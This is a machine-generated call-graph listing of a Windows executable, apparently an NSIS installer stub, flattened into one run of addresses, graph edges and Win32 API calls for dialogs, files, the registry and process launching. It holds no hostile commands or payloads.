402dab 21 API calls 3924->3926 3927 402dab 21 API calls 3925->3927 3931 401c81 3925->3931 3926->3925 3927->3931 3928 401cd8 3930 402dab 21 API calls 3928->3930 3929 401c8c 3932 402d89 21 API calls 3929->3932 3933 401cdd 3930->3933 3931->3928 3931->3929 3934 401c91 3932->3934 3935 402dab 21 API calls 3933->3935 3936 402d89 21 API calls 3934->3936 3938 401ce6 FindWindowExW 3935->3938 3937 401c9d 3936->3937 3939 401cc8 SendMessageW 3937->3939 3940 401caa SendMessageTimeoutW 3937->3940 3941 401d08 3938->3941 3939->3941 3940->3941 3942 4028c9 3943 4028cf 3942->3943 3944 4028d7 FindClose 3943->3944 3945 402c2f 3943->3945 3944->3945 3949 405550 3950 405560 3949->3950 3951 405574 3949->3951 3953 405566 3950->3953 3954 4055bd 3950->3954 3952 40557c IsWindowVisible 3951->3952 3960 405593 3951->3960 3952->3954 3956 405589 3952->3956 3955 404522 SendMessageW 3953->3955 3957 4055c2 CallWindowProcW 3954->3957 3958 405570 3955->3958 3959 404e91 5 API calls 3956->3959 3957->3958 3959->3960 3960->3957 3961 404f11 4 API calls 3960->3961 3961->3954 3962 4016d1 3963 402dab 21 API calls 3962->3963 3964 4016d7 GetFullPathNameW 3963->3964 3965 4016f1 3964->3965 3971 401713 3964->3971 3968 4068b4 2 API calls 3965->3968 3965->3971 3966 401728 GetShortPathNameW 3967 402c2f 3966->3967 3969 401703 3968->3969 3969->3971 3972 406557 lstrcpynW 3969->3972 3971->3966 3971->3967 3972->3971 3973 401e53 GetDC 3974 402d89 21 API calls 3973->3974 3975 401e65 GetDeviceCaps MulDiv ReleaseDC 3974->3975 3976 402d89 21 API calls 3975->3976 3977 401e96 3976->3977 3978 406594 21 API calls 3977->3978 3979 401ed3 CreateFontIndirectW 3978->3979 3980 40263d 3979->3980 3981 402955 3982 402dab 21 API calls 3981->3982 3983 402961 3982->3983 3984 402977 3983->3984 3985 402dab 21 API calls 3983->3985 3986 406022 2 API calls 3984->3986 3985->3984 3987 40297d 3986->3987 4009 406047 GetFileAttributesW CreateFileW 3987->4009 3989 40298a 3990 402a40 3989->3990 3993 4029a5 GlobalAlloc 3989->3993 3994 402a28 3989->3994 3991 402a47 DeleteFileW 3990->3991 3992 402a5a 3990->3992 3991->3992 3993->3994 3995 4029be 3993->3995 3996 4032b9 35 API calls 3994->3996 4010 4034ea SetFilePointer 3995->4010 3998 402a35 CloseHandle 3996->3998 3998->3990 3999 4029c4 4000 4034d4 ReadFile 3999->4000 4001 4029cd GlobalAlloc 4000->4001 4002 402a11 4001->4002 4003 4029dd 4001->4003 4005 4060f9 WriteFile 4002->4005 4004 4032b9 35 API calls 4003->4004 4007 4029ea 4004->4007 4006 402a1d GlobalFree 4005->4006 4006->3994 4008 402a08 GlobalFree 4007->4008 4008->4002 4009->3989 4010->3999 3555 403fd7 3556 404150 3555->3556 3557 403fef 3555->3557 3558 404161 GetDlgItem GetDlgItem 3556->3558 3561 4041a1 3556->3561 3557->3556 3559 403ffb 3557->3559 3560 4044d6 22 API calls 3558->3560 3562 404006 SetWindowPos 3559->3562 3563 404019 3559->3563 3564 40418b SetClassLongW 3560->3564 3565 4041fb 3561->3565 3574 401389 2 API calls 3561->3574 3562->3563 3567 404022 ShowWindow 3563->3567 3568 404064 3563->3568 3571 40140b 2 API calls 3564->3571 3566 404522 SendMessageW 3565->3566 3575 40414b 3565->3575 3597 40420d 3566->3597 3569 404042 GetWindowLongW 3567->3569 3570 40413d 3567->3570 3572 404083 3568->3572 3573 40406c DestroyWindow 3568->3573 3569->3570 3576 40405b ShowWindow 3569->3576 3637 40453d 3570->3637 3571->3561 3578 404088 SetWindowLongW 3572->3578 3579 404099 3572->3579 3577 40445f 3573->3577 3580 4041d3 3574->3580 3576->3568 3577->3575 3586 404490 ShowWindow 3577->3586 3578->3575 3579->3570 3584 4040a5 GetDlgItem 3579->3584 3580->3565 3585 4041d7 SendMessageW 3580->3585 3582 40140b 2 API calls 3582->3597 3583 404461 DestroyWindow EndDialog 3583->3577 3587 4040d3 3584->3587 3588 4040b6 SendMessageW IsWindowEnabled 3584->3588 3585->3575 3586->3575 3590 4040e0 3587->3590 3592 404127 SendMessageW 3587->3592 3593 4040f3 3587->3593 3601 4040d8 3587->3601 3588->3575 3588->3587 3589 406594 21 API calls 3589->3597 3590->3592 3590->3601 3592->3570 3594 404110 3593->3594 3595 4040fb 3593->3595 3599 40140b 2 API calls 3594->3599 3598 40140b 2 API calls 3595->3598 3596 40410e 3596->3570 3597->3575 3597->3582 3597->3583 3597->3589 3600 4044d6 22 API calls 3597->3600 3619 4043a1 DestroyWindow 3597->3619 3628 4044d6 3597->3628 3598->3601 3602 404117 3599->3602 3600->3597 3634 4044af 3601->3634 3602->3570 3602->3601 3604 404288 GetDlgItem 3605 4042a5 ShowWindow KiUserCallbackDispatcher 3604->3605 3606 40429d 3604->3606 3631 4044f8 KiUserCallbackDispatcher 3605->3631 3606->3605 3608 4042cf EnableWindow 3613 4042e3 3608->3613 3609 4042e8 GetSystemMenu EnableMenuItem SendMessageW 3610 404318 SendMessageW 3609->3610 3609->3613 3610->3613 3612 403fb8 22 API calls 3612->3613 3613->3609 3613->3612 3632 40450b SendMessageW 3613->3632 3633 406557 lstrcpynW 3613->3633 3615 404347 lstrlenW 3616 406594 21 API calls 3615->3616 3617 40435d SetWindowTextW 3616->3617 3618 401389 2 API calls 3617->3618 3618->3597 3619->3577 3620 4043bb CreateDialogParamW 3619->3620 3620->3577 3621 4043ee 3620->3621 3622 4044d6 22 API calls 3621->3622 3623 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3622->3623 3624 401389 2 API calls 3623->3624 3625 40443f 3624->3625 3625->3575 3626 404447 ShowWindow 3625->3626 3627 404522 SendMessageW 3626->3627 3627->3577 3629 406594 21 API calls 3628->3629 3630 4044e1 SetDlgItemTextW 3629->3630 3630->3604 3631->3608 3632->3613 3633->3615 3635 4044b6 3634->3635 3636 4044bc SendMessageW 3634->3636 3635->3636 3636->3596 3638 404555 GetWindowLongW 3637->3638 3648 404600 3637->3648 3639 40456a 3638->3639 3638->3648 3640 404597 GetSysColor 3639->3640 3641 40459a 3639->3641 3639->3648 3640->3641 3642 4045a0 SetTextColor 3641->3642 3643 4045aa SetBkMode 3641->3643 3642->3643 3644 4045c2 GetSysColor 3643->3644 3645 4045c8 3643->3645 3644->3645 3646 4045d9 3645->3646 3647 4045cf SetBkColor 3645->3647 3646->3648 3649 4045f3 CreateBrushIndirect 3646->3649 3650 4045ec DeleteObject 3646->3650 3647->3646 3648->3575 3649->3648 3650->3649 4011 4014d7 4012 402d89 21 API calls 4011->4012 4013 4014dd Sleep 4012->4013 4015 402c2f 4013->4015 4016 40195b 4017 402dab 21 API calls 4016->4017 4018 401962 lstrlenW 4017->4018 4019 40263d 4018->4019 3712 4020dd 3713 4021a1 3712->3713 3714 4020ef 3712->3714 3716 401423 28 API calls 3713->3716 3715 402dab 21 API calls 3714->3715 3717 4020f6 3715->3717 3723 4022fb 3716->3723 3718 402dab 21 API calls 3717->3718 3719 4020ff 3718->3719 3720 402115 LoadLibraryExW 3719->3720 3721 402107 GetModuleHandleW 3719->3721 3720->3713 3722 402126 3720->3722 3721->3720 3721->3722 3732 4069ba 3722->3732 3726 402170 3728 4055dc 28 API calls 3726->3728 3727 402137 3729 402147 3727->3729 3730 401423 28 API calls 3727->3730 3728->3729 3729->3723 3731 402193 FreeLibrary 3729->3731 3730->3729 3731->3723 3737 406579 WideCharToMultiByte 3732->3737 3734 4069d7 3735 402131 3734->3735 3736 4069de GetProcAddress 3734->3736 3735->3726 3735->3727 3736->3735 3737->3734 4020 402b5e 4021 402bb0 4020->4021 4022 402b65 4020->4022 4023 40694b 5 API calls 4021->4023 4025 402d89 21 API calls 4022->4025 4028 402bae 4022->4028 4024 402bb7 4023->4024 4026 402dab 21 API calls 4024->4026 4027 402b73 4025->4027 4029 402bc0 4026->4029 4030 402d89 21 API calls 4027->4030 4029->4028 4031 402bc4 IIDFromString 4029->4031 4034 402b7f 4030->4034 4031->4028 4032 402bd3 4031->4032 4032->4028 4038 406557 lstrcpynW 4032->4038 4037 40649e wsprintfW 4034->4037 4035 402bf0 CoTaskMemFree 4035->4028 4037->4028 4038->4035 2937 401761 2943 402dab 2937->2943 2941 40176f 2942 406076 2 API calls 2941->2942 2942->2941 2944 402db7 2943->2944 2953 406594 2944->2953 2947 401768 2949 406076 2947->2949 2950 406083 GetTickCount GetTempFileNameW 2949->2950 2951 4060bd 2950->2951 2952 4060b9 2950->2952 2951->2941 2952->2950 2952->2951 2968 40659f 2953->2968 2954 4067e6 2955 402dd8 2954->2955 2992 406557 lstrcpynW 2954->2992 2955->2947 2970 406805 2955->2970 2957 4067b7 lstrlenW 2957->2968 2959 4066b0 GetSystemDirectoryW 2959->2968 2960 406594 15 API calls 2960->2957 2963 4066c6 GetWindowsDirectoryW 2963->2968 2964 406594 15 API calls 2964->2968 2965 406758 lstrcatW 2965->2968 2966 406805 5 API calls 2966->2968 2968->2954 2968->2957 2968->2959 2968->2960 2968->2963 2968->2964 2968->2965 2968->2966 2969 406728 SHGetPathFromIDListW CoTaskMemFree 2968->2969 2979 406425 2968->2979 2984 40694b GetModuleHandleA 2968->2984 2990 40649e wsprintfW 2968->2990 2991 406557 lstrcpynW 2968->2991 2969->2968 2976 406812 2970->2976 2971 40688d CharPrevW 2972 406888 2971->2972 2972->2971 2974 4068ae 2972->2974 2973 40687b CharNextW 2973->2972 2973->2976 2974->2947 2976->2972 2976->2973 2977 406867 CharNextW 2976->2977 2978 406876 CharNextW 2976->2978 3000 405e53 2976->3000 2977->2976 2978->2973 2993 4063c4 2979->2993 2982 406489 2982->2968 2983 406459 RegQueryValueExW RegCloseKey 2983->2982 2985 406971 GetProcAddress 2984->2985 2986 406967 2984->2986 2987 406980 2985->2987 2997 4068db GetSystemDirectoryW 2986->2997 2987->2968 2989 40696d 2989->2985 2989->2987 2990->2968 2991->2968 2992->2955 2994 4063d3 2993->2994 2995 4063d7 2994->2995 2996 4063dc RegOpenKeyExW 2994->2996 2995->2982 2995->2983 2996->2995 2998 4068fd wsprintfW LoadLibraryExW 2997->2998 2998->2989 3001 405e59 3000->3001 3002 405e6f 3001->3002 3003 405e60 CharNextW 3001->3003 3002->2976 3003->3001 4039 401d62 4040 402d89 21 API calls 4039->4040 4041 401d73 SetWindowLongW 4040->4041 4042 402c2f 4041->4042 3004 401ee3 3012 402d89 3004->3012 3006 401ee9 3007 402d89 21 API calls 3006->3007 3008 401ef5 3007->3008 3009 401f01 ShowWindow 3008->3009 3010 401f0c EnableWindow 3008->3010 3011 402c2f 3009->3011 3010->3011 3013 406594 21 API calls 3012->3013 3014 402d9e 3013->3014 3014->3006 4043 4028e3 4044 4028eb 4043->4044 4045 4028ef FindNextFileW 4044->4045 4047 402901 4044->4047 4046 402948 4045->4046 4045->4047 4049 406557 lstrcpynW 4046->4049 4049->4047 4050 403be7 4051 403bf2 4050->4051 4052 403bf6 4051->4052 4053 403bf9 GlobalAlloc 4051->4053 4053->4052 4054 401568 4055 402ba9 4054->4055 4058 40649e wsprintfW 4055->4058 4057 402bae 4058->4057 4059 40196d 4060 402d89 21 API calls 4059->4060 4061 401974 4060->4061 4062 402d89 21 API calls 4061->4062 4063 401981 4062->4063 4064 402dab 21 API calls 4063->4064 4065 401998 lstrlenW 4064->4065 4067 4019a9 4065->4067 4066 4019ea 4067->4066 4071 406557 lstrcpynW 4067->4071 4069 4019da 4069->4066 4070 4019df lstrlenW 4069->4070 4070->4066 4071->4069 4072 40166f 4073 402dab 21 API calls 4072->4073 4074 401675 4073->4074 4075 4068b4 2 API calls 4074->4075 4076 40167b 4075->4076 4077 402af0 4078 402d89 21 API calls 4077->4078 4079 402af6 4078->4079 4080 406594 21 API calls 4079->4080 4081 402933 4079->4081 4080->4081 4082 4026f1 4083 402d89 21 API calls 4082->4083 4085 402700 4083->4085 4084 40274a ReadFile 4084->4085 4094 40283d 4084->4094 4085->4084 4086 4060ca ReadFile 4085->4086 4087 406128 5 API calls 4085->4087 4088 40278a MultiByteToWideChar 4085->4088 4089 40283f 4085->4089 4091 4027b0 SetFilePointer MultiByteToWideChar 4085->4091 4092 402850 4085->4092 4085->4094 4086->4085 4087->4085 4088->4085 4095 40649e wsprintfW 4089->4095 4091->4085 4093 402871 SetFilePointer 4092->4093 4092->4094 4093->4094 4095->4094 3514 401774 3515 402dab 21 API calls 3514->3515 3516 40177b 3515->3516 3517 4017a3 3516->3517 3518 40179b 3516->3518 3554 406557 lstrcpynW 3517->3554 3553 406557 lstrcpynW 3518->3553 3521 4017a1 3525 406805 5 API calls 3521->3525 3522 4017ae 3523 405e26 3 API calls 3522->3523 3524 4017b4 lstrcatW 3523->3524 3524->3521 3535 4017c0 3525->3535 3526 4068b4 2 API calls 3526->3535 3527 406022 2 API calls 3527->3535 3529 4017d2 CompareFileTime 3529->3535 3530 401892 3531 4055dc 28 API calls 3530->3531 3533 40189c 3531->3533 3532 4055dc 28 API calls 3534 40187e 3532->3534 3536 4032b9 35 API calls 3533->3536 3535->3526 3535->3527 3535->3529 3535->3530 3539 406594 21 API calls 3535->3539 3544 406557 lstrcpynW 3535->3544 3549 405bb7 MessageBoxIndirectW 3535->3549 3550 401869 3535->3550 3552 406047 GetFileAttributesW CreateFileW 3535->3552 3537 4018af 3536->3537 3538 4018c3 SetFileTime 3537->3538 3540 4018d5 CloseHandle 3537->3540 3538->3540 3539->3535 3540->3534 3541 4018e6 3540->3541 3542 4018eb 3541->3542 3543 4018fe 3541->3543 3545 406594 21 API calls 3542->3545 3546 406594 21 API calls 3543->3546 3544->3535 3547 4018f3 lstrcatW 3545->3547 3548 401906 3546->3548 3547->3548 3551 405bb7 MessageBoxIndirectW 3548->3551 3549->3535 3550->3532 3550->3534 3551->3534 3552->3535 3553->3521 3554->3522 4096 4014f5 SetForegroundWindow 4097 402c2f 4096->4097 4098 401a77 4099 402d89 21 API calls 4098->4099 4100 401a80 4099->4100 4101 402d89 21 API calls 4100->4101 4102 401a25 4101->4102 3651 401578 3652 401591 3651->3652 3653 401588 ShowWindow 3651->3653 3654 402c2f 3652->3654 3655 40159f ShowWindow 3652->3655 3653->3652 3655->3654 3656 4023f9 3657 402dab 21 API calls 3656->3657 3658 402408 3657->3658 3659 402dab 21 API calls 3658->3659 3660 402411 3659->3660 3661 402dab 21 API calls 3660->3661 3662 40241b GetPrivateProfileStringW 3661->3662 4103 401ffb 4104 402dab 21 API calls 4103->4104 4105 402002 4104->4105 4106 4068b4 2 API calls 4105->4106 4107 402008 4106->4107 4109 402019 4107->4109 4110 40649e wsprintfW 4107->4110 4110->4109 4111 401b7c 4112 402dab 21 API calls 4111->4112 4113 401b83 4112->4113 4114 402d89 21 API calls 4113->4114 4115 401b8c wsprintfW 4114->4115 4116 402c2f 4115->4116 4117 401000 4118 401037 BeginPaint GetClientRect 4117->4118 4119 40100c DefWindowProcW 4117->4119 4121 4010f3 4118->4121 4124 401179 4119->4124 4122 401073 CreateBrushIndirect FillRect DeleteObject 4121->4122 4123 4010fc 4121->4123 4122->4121 4125 401102 CreateFontIndirectW 4123->4125 4126 401167 EndPaint 4123->4126 4125->4126 4127 401112 6 API calls 4125->4127 4126->4124 4127->4126 4128 404980 4129 404990 4128->4129 4130 4049b6 4128->4130 4132 4044d6 22 API calls 4129->4132 4131 40453d 8 API calls 4130->4131 4133 4049c2 4131->4133 4134 40499d SetDlgItemTextW 4132->4134 4134->4130 4135 401680 4136 402dab 21 API calls 4135->4136 4137 401687 4136->4137 4138 402dab 21 API calls 4137->4138 4139 401690 4138->4139 4140 402dab 21 API calls 4139->4140 4141 401699 MoveFileW 4140->4141 4142 4016a5 4141->4142 4143 4016ac 4141->4143 4144 401423 28 API calls 4142->4144 4145 4068b4 2 API calls 4143->4145 4147 4022fb 4143->4147 4144->4147 4146 4016bb 4145->4146 4146->4147 4148 406317 40 API calls 4146->4148 4148->4142 4149 401503 4150 401508 4149->4150 4152 401520 4149->4152 4151 402d89 21 API calls 4150->4151 4151->4152 4153 401a04 4154 402dab 21 API calls 4153->4154 4155 401a0b 4154->4155 4156 402dab 21 API calls 4155->4156 4157 401a14 4156->4157 4158 401a1b lstrcmpiW 4157->4158 4159 401a2d lstrcmpW 4157->4159 4160 401a21 4158->4160 4159->4160 4161 402304 4162 402dab 21 API calls 4161->4162 4163 40230a 4162->4163 4164 402dab 21 API calls 4163->4164 4165 402313 4164->4165 4166 402dab 21 API calls 4165->4166 4167 40231c 4166->4167 4168 4068b4 2 API calls 4167->4168 4169 402325 4168->4169 4170 402336 lstrlenW lstrlenW 4169->4170 4171 402329 4169->4171 4173 4055dc 28 API calls 4170->4173 4172 4055dc 28 API calls 4171->4172 4175 402331 4171->4175 4172->4175 4174 402374 SHFileOperationW 4173->4174 4174->4171 4174->4175 4176 401d86 4177 401d99 GetDlgItem 4176->4177 4178 401d8c 4176->4178 4180 401d93 4177->4180 4179 402d89 21 API calls 4178->4179 4179->4180 4181 401dda GetClientRect LoadImageW SendMessageW 4180->4181 4182 402dab 21 API calls 4180->4182 4184 401e38 4181->4184 4186 401e44 4181->4186 4182->4181 4185 401e3d DeleteObject 4184->4185 4184->4186 4185->4186 4187 402388 4188 40238f 4187->4188 4192 4023a2 4187->4192 4189 406594 21 API calls 4188->4189 4190 40239c 4189->4190 4191 405bb7 MessageBoxIndirectW 4190->4191 4191->4192 4193 402c0a SendMessageW 4194 402c24 InvalidateRect 4193->4194 4195 402c2f 4193->4195 4194->4195 4196 40460c lstrcpynW lstrlenW 4197 40248f 4198 402dab 21 API calls 4197->4198 4199 4024a1 4198->4199 4200 402dab 21 API calls 4199->4200 4201 4024ab 4200->4201 4214 402e3b 4201->4214 4204 4024e3 4206 4024ef 4204->4206 4208 402d89 21 API calls 4204->4208 4205 402933 4209 40250e RegSetValueExW 4206->4209 4211 4032b9 35 API calls 4206->4211 4207 402dab 21 API calls 4210 4024d9 lstrlenW 4207->4210 4208->4206 4212 402524 RegCloseKey 4209->4212 4210->4204 4211->4209 4212->4205 4215 402e56 4214->4215 4218 4063f2 4215->4218 4219 406401 4218->4219 4220 4024bb 4219->4220 4221 40640c RegCreateKeyExW 4219->4221 4220->4204 4220->4205 4220->4207 4221->4220 4222 402910 4223 402dab 21 API calls 4222->4223 4224 402917 FindFirstFileW 4223->4224 4225 40293f 4224->4225 4229 40292a 4224->4229 4230 40649e wsprintfW 4225->4230 4227 402948 4231 406557 lstrcpynW 4227->4231 4230->4227 4231->4229 4232 401911 4233 401948 4232->4233 4234 402dab 21 API calls 4233->4234 4235 40194d 4234->4235 4236 405c63 71 API calls 4235->4236 4237 401956 4236->4237 4238 401491 4239 4055dc 28 API calls 4238->4239 4240 401498 4239->4240 4241 401914 4242 402dab 21 API calls 4241->4242 4243 40191b 4242->4243 4244 405bb7 MessageBoxIndirectW 4243->4244 4245 401924 4244->4245 4246 404695 4247 4046ad 4246->4247 4253 4047c7 4246->4253 4254 4044d6 22 API calls 4247->4254 4248 404831 4249 4048fb 4248->4249 4250 40483b GetDlgItem 4248->4250 4255 40453d 8 API calls 4249->4255 4251 404855 4250->4251 4252 4048bc 4250->4252 4251->4252 4258 40487b SendMessageW LoadCursorW SetCursor 4251->4258 4252->4249 4259 4048ce 4252->4259 4253->4248 4253->4249 4256 404802 GetDlgItem SendMessageW 4253->4256 4257 404714 4254->4257 4269 4048f6 4255->4269 4279 4044f8 KiUserCallbackDispatcher 4256->4279 4261 4044d6 22 API calls 4257->4261 4280 404944 4258->4280 4264 4048e4 4259->4264 4265 4048d4 SendMessageW 4259->4265 4262 404721 CheckDlgButton 4261->4262 4277 4044f8 KiUserCallbackDispatcher 4262->4277 4264->4269 4270 4048ea SendMessageW 4264->4270 4265->4264 4266 40482c 4271 404920 SendMessageW 4266->4271 4270->4269 4271->4248 4272 40473f GetDlgItem 4278 40450b SendMessageW 4272->4278 4274 404755 SendMessageW 4275 404772 GetSysColor 4274->4275 4276 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4274->4276 4275->4276 4276->4269 4277->4272 4278->4274 4279->4266 4283 405b7d ShellExecuteExW 4280->4283 4282 4048aa LoadCursorW SetCursor 4282->4252 4283->4282 4284 402896 4285 40289d 4284->4285 4291 402bae 4284->4291 4286 402d89 21 API calls 4285->4286 4287 4028a4 4286->4287 4288 4028b3 SetFilePointer 4287->4288 4289 4028c3 4288->4289 4288->4291 4292 40649e wsprintfW 4289->4292 4292->4291 4293 401f17 4294 402dab 21 API calls 4293->4294 4295 401f1d 4294->4295 4296 402dab 21 API calls 4295->4296 4297 401f26 4296->4297 4298 402dab 21 API calls 4297->4298 4299 401f2f 4298->4299 4300 402dab 21 API calls 4299->4300 4301 401f38 4300->4301 4302 401423 28 API calls 4301->4302 4303 401f3f 4302->4303 4310 405b7d ShellExecuteExW 4303->4310 4305 401f87 4306 402933 4305->4306 4307 4069f6 5 API calls 4305->4307 4308 401fa4 CloseHandle 4307->4308 4308->4306 4310->4305 4311 402f98 4312 402fc3 4311->4312 4313 402faa SetTimer 4311->4313 4314 403018 4312->4314 4315 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4312->4315 4313->4312 4315->4314 3663 40571b 3664 4058c5 3663->3664 3665 40573c GetDlgItem GetDlgItem GetDlgItem 3663->3665 3667 4058f6 3664->3667 3668 4058ce GetDlgItem CreateThread CloseHandle 3664->3668 3708 40450b SendMessageW 3665->3708 3670 405921 3667->3670 3672 405946 3667->3672 3673 40590d ShowWindow ShowWindow 3667->3673 3668->3667 3711 4056af 5 API calls 3668->3711 3669 4057ac 3678 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3669->3678 3671 405981 3670->3671 3675 405935 3670->3675 3676 40595b ShowWindow 3670->3676 3671->3672 3685 40598f SendMessageW 3671->3685 3677 40453d 8 API calls 3672->3677 3710 40450b SendMessageW 3673->3710 3679 4044af SendMessageW 3675->3679 3681 40597b 3676->3681 3682 40596d 3676->3682 3680 405954 3677->3680 3683 405821 3678->3683 3684 405805 SendMessageW SendMessageW 3678->3684 3679->3672 3690 4044af SendMessageW 3681->3690 3689 4055dc 28 API calls 3682->3689 3686 405834 3683->3686 3687 405826 SendMessageW 3683->3687 3684->3683 3685->3680 3688 4059a8 CreatePopupMenu 3685->3688 3692 4044d6 22 API calls 3686->3692 3687->3686 3691 406594 21 API calls 3688->3691 3689->3681 3690->3671 3693 4059b8 AppendMenuW 3691->3693 3694 405844 3692->3694 3695 4059d5 GetWindowRect 3693->3695 3696 4059e8 TrackPopupMenu 3693->3696 3697 405881 GetDlgItem SendMessageW 3694->3697 3698 40584d ShowWindow 3694->3698 3695->3696 3696->3680 3699 405a03 3696->3699 3697->3680 3702 4058a8 SendMessageW SendMessageW 3697->3702 3700 405870 3698->3700 3701 405863 ShowWindow 3698->3701 3703 405a1f SendMessageW 3699->3703 3709 40450b SendMessageW 3700->3709 3701->3700 3702->3680 3703->3703 3704 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3703->3704 3706 405a61 SendMessageW 3704->3706 3706->3706 3707 405a8a GlobalUnlock SetClipboardData CloseClipboard 3706->3707 3707->3680 3708->3669 3709->3697 3710->3670 4316 401d1c 4317 402d89 21 API calls 4316->4317 4318 401d22 IsWindow 4317->4318 4319 401a25 4318->4319 4320 404d1d 4321 404d49 4320->4321 4322 404d2d 4320->4322 4323 404d7c 4321->4323 4324 404d4f SHGetPathFromIDListW 4321->4324 4331 405b9b GetDlgItemTextW 4322->4331 4326 404d5f 4324->4326 4330 404d66 SendMessageW 4324->4330 4328 40140b 2 API calls 4326->4328 4327 404d3a SendMessageW 4327->4321 4328->4330 4330->4323 4331->4327 4332 40149e 4333 4023a2 4332->4333 4334 4014ac PostQuitMessage 4332->4334 4334->4333 4335 401ba0 4336 401bf1 4335->4336 4341 401bad 4335->4341 4337 401bf6 4336->4337 4338 401c1b GlobalAlloc 4336->4338 4344 4023a2 4337->4344 4356 406557 lstrcpynW 4337->4356 4339 406594 21 API calls 4338->4339 4345 401c36 4339->4345 4340 406594 21 API calls 4346 40239c 4340->4346 4342 401bc4 4341->4342 4341->4345 4354 406557 lstrcpynW 4342->4354 4345->4340 4345->4344 4350 405bb7 MessageBoxIndirectW 4346->4350 4348 401c08 GlobalFree 4348->4344 4349 401bd3 4355 406557 lstrcpynW 4349->4355 4350->4344 4352 401be2 4357 406557 lstrcpynW 4352->4357 4354->4349 4355->4352 4356->4348 4357->4344 4358 402621 4359 402dab 21 API calls 4358->4359 4360 402628 4359->4360 4363 406047 GetFileAttributesW CreateFileW 4360->4363 4362 402634 4363->4362 4364 4025a3 4365 402deb 21 API calls 4364->4365 4366 4025ad 4365->4366 4367 402d89 21 API calls 4366->4367 4368 4025b6 4367->4368 4369 4025d2 RegEnumKeyW 4368->4369 4370 4025de RegEnumValueW 4368->4370 4371 402933 4368->4371 4372 4025f3 RegCloseKey 4369->4372 4370->4372 4372->4371 3190 4015a8 3191 402dab 21 API calls 3190->3191 3192 4015af SetFileAttributesW 3191->3192 3193 4015c1 3192->3193 3194 401fa9 3195 402dab 21 API calls 3194->3195 3196 401faf 3195->3196 3197 4055dc 28 API calls 3196->3197 3198 401fb9 3197->3198 3209 405b3a CreateProcessW 3198->3209 3203 402933 3204 401fd4 3205 401fe4 3204->3205 3206 401fd9 3204->3206 3207 401fe2 CloseHandle 3205->3207 3217 40649e wsprintfW 3206->3217 3207->3203 3210 401fbf 3209->3210 3211 405b6d CloseHandle 3209->3211 3210->3203 3210->3207 3212 4069f6 WaitForSingleObject 3210->3212 3211->3210 3213 406a10 3212->3213 3214 406a22 GetExitCodeProcess 3213->3214 3218 406987 3213->3218 3214->3204 3217->3207 3219 4069a4 PeekMessageW 3218->3219 3220 4069b4 WaitForSingleObject 3219->3220 3221 40699a DispatchMessageW 3219->3221 3220->3213 3221->3219 3222 40252f 3233 402deb 3222->3233 3225 402dab 21 API calls 3226 402542 3225->3226 3227 40254d RegQueryValueExW 3226->3227 3232 402933 3226->3232 3228 402573 RegCloseKey 3227->3228 3229 40256d 3227->3229 3228->3232 3229->3228 3238 40649e wsprintfW 3229->3238 3234 402dab 21 API calls 3233->3234 3235 402e02 3234->3235 3236 4063c4 RegOpenKeyExW 3235->3236 3237 402539 3236->3237 3237->3225 3238->3228 4374 40202f 4375 402dab 21 API calls 4374->4375 4376 402036 4375->4376 4377 40694b 5 API calls 4376->4377 4378 402045 4377->4378 4379 402061 GlobalAlloc 4378->4379 4382 4020d1 4378->4382 4380 402075 4379->4380 4379->4382 4381 40694b 5 API calls 4380->4381 4383 40207c 4381->4383 4384 40694b 5 API calls 4383->4384 4385 402086 4384->4385 4385->4382 4389 40649e wsprintfW 4385->4389 4387 4020bf 4390 40649e wsprintfW 4387->4390 4389->4387 4390->4382 4391 4021af 4392 402dab 21 API calls 4391->4392 4393 4021b6 4392->4393 4394 402dab 21 API calls 4393->4394 4395 4021c0 4394->4395 4396 402dab 21 API calls 4395->4396 4397 4021ca 4396->4397 4398 402dab 21 API calls 4397->4398 4399 4021d4 4398->4399 4400 402dab 21 API calls 4399->4400 4401 4021de 4400->4401 4402 40221d CoCreateInstance 4401->4402 4403 402dab 21 API calls 4401->4403 4404 40223c 4402->4404 4403->4402 4405 401423 28 API calls 4404->4405 4406 4022fb 4404->4406 4405->4406 3239 403532 SetErrorMode GetVersionExW 3240 403586 GetVersionExW 3239->3240 3241 4035be 3239->3241 3240->3241 3242 403615 3241->3242 3243 40694b 5 API calls 3241->3243 3244 4068db 3 API calls 3242->3244 3243->3242 3245 40362b lstrlenA 3244->3245 3245->3242 3246 40363b 3245->3246 3247 40694b 5 API calls 3246->3247 3248 403642 3247->3248 3249 40694b 5 API calls 3248->3249 3250 403649 3249->3250 3251 40694b 5 API calls 3250->3251 3255 403655 #17 OleInitialize SHGetFileInfoW 3251->3255 3254 4036a4 GetCommandLineW 3328 406557 lstrcpynW 3254->3328 3327 406557 lstrcpynW 3255->3327 3257 4036b6 3258 405e53 CharNextW 3257->3258 3259 4036dc CharNextW 3258->3259 3267 4036ee 3259->3267 3260 4037f0 3261 403804 GetTempPathW 3260->3261 3329 403501 3261->3329 3263 40381c 3264 403820 GetWindowsDirectoryW lstrcatW 3263->3264 3265 403876 DeleteFileW 3263->3265 3268 403501 12 API calls 3264->3268 3339 403082 GetTickCount GetModuleFileNameW 3265->3339 3266 405e53 CharNextW 3266->3267 3267->3260 3267->3266 3273 4037f2 3267->3273 3270 40383c 3268->3270 3270->3265 3272 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3270->3272 3271 40388a 3274 403941 3271->3274 3277 403931 3271->3277 3281 405e53 CharNextW 3271->3281 3275 403501 12 API calls 3272->3275 3423 406557 lstrcpynW 3273->3423 3428 403b4f 3274->3428 3279 40386e 3275->3279 3367 403c29 3277->3367 3279->3265 3279->3274 3294 4038a9 3281->3294 3283 403ab3 3285 403b37 ExitProcess 3283->3285 3286 403abb GetCurrentProcess OpenProcessToken 3283->3286 3284 403a8f 3435 405bb7 3284->3435 3288 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3286->3288 3289 403b07 3286->3289 3288->3289 3296 40694b 5 API calls 3289->3296 3290 403907 3297 405f2e 18 API calls 3290->3297 3291 40394a 3295 405b22 5 API calls 3291->3295 3294->3290 3294->3291 3298 40394f lstrlenW 3295->3298 3299 403b0e 3296->3299 3300 403913 3297->3300 3426 406557 lstrcpynW 3298->3426 3302 403b23 ExitWindowsEx 3299->3302 3304 403b30 3299->3304 3300->3274 3424 406557 lstrcpynW 3300->3424 3302->3285 3302->3304 3303 403969 